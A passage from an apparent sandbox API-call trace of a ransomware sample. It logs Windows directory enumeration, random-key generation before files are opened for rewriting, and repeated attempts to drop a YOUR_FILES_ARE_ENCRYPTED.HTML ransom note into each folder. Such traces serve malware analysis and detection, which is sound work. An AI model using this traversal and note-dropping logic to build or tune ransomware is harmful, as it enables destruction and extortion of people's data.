cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0109.901] StrStrIW (lpFirst="tasks.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 99 [0109.901] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0109.901] lstrlenW (lpString=".xml") returned 4 [0109.901] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0109.901] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.901] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0109.902] StrStrIW (lpFirst="wmp.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.902] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 97 [0109.902] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0109.902] lstrlenW (lpString=".ico") returned 4 [0109.902] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0109.902] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6066c7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6066c7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae60b4de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.902] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6066c7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6066c7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae60b4de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.902] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0109.902] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0109.902] GetProcessHeap () returned 0x600000 [0109.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.902] GetProcessHeap () returned 0x600000 [0109.902] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.902] GetProcessHeap () returned 0x600000 [0109.902] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.903] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0109.903] StrStrIW (lpFirst="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.903] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 89 [0109.903] GetProcessHeap () returned 0x600000 [0109.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.904] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0109.904] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0109.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae632538, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.905] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae632538, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.905] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="en-US", cAlternateFileName="")) returned 1 [0109.905] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.905] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 95 [0109.905] GetProcessHeap () returned 0x600000 [0109.905] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.906] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0109.906] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0109.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae61d951, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3b9c, dwReserved1=0x6f3ae8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0109.906] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xae61d951, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3b9c, dwReserved1=0x6f3ae8, cFileName="..", cAlternateFileName="")) returned 1 [0109.906] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x6f3b9c, dwReserved1=0x6f3ae8, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0109.906] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.906] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 108 [0109.906] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.906] lstrlenW (lpString=".xml") returned 4 [0109.906] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0109.906] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0109.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.906] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae61d951, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae61d951, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae627589, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3b9c, dwReserved1=0x6f3ae8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.906] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae61d951, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae61d951, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae627589, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3b9c, dwReserved1=0x6f3ae8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.906] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0109.907] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0109.907] GetProcessHeap () returned 0x600000 [0109.907] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3185df0 [0109.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.907] GetProcessHeap () returned 0x600000 [0109.907] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3185df0 | out: hHeap=0x600000) returned 1 [0109.907] GetProcessHeap () returned 0x600000 [0109.907] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0109.908] StrStrIW (lpFirst="folder.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.908] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 100 [0109.908] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0109.908] lstrlenW (lpString=".ico") returned 4 [0109.908] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0109.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0109.908] StrStrIW (lpFirst="print_pref.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.908] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 104 [0109.908] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0109.908] lstrlenW (lpString=".ico") returned 4 [0109.908] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0109.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0109.908] StrStrIW (lpFirst="print_property.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.908] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 108 [0109.908] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0109.908] lstrlenW (lpString=".ico") returned 4 [0109.908] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0109.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0109.908] StrStrIW (lpFirst="print_queue.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.908] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 105 [0109.908] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0109.908] lstrlenW (lpString=".ico") returned 4 [0109.908] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0109.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0109.908] StrStrIW (lpFirst="scan_.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.908] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 99 [0109.908] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0109.909] lstrlenW (lpString=".ico") returned 4 [0109.909] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0109.909] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0109.909] StrStrIW (lpFirst="scan_property.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.909] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 107 [0109.909] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0109.909] lstrlenW (lpString=".ico") returned 4 [0109.909] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0109.909] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21344266, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x21344266, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0109.909] StrStrIW (lpFirst="scan_settings.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.909] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 107 [0109.909] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0109.909] lstrlenW (lpString=".ico") returned 4 [0109.909] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0109.909] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0109.909] StrStrIW (lpFirst="tasks.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.909] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 99 [0109.909] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0109.909] lstrlenW (lpString=".xml") returned 4 [0109.909] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0109.909] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.909] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae632538, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae632538, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae63739f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.909] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae632538, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae632538, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae63739f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f948, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.909] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.910] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 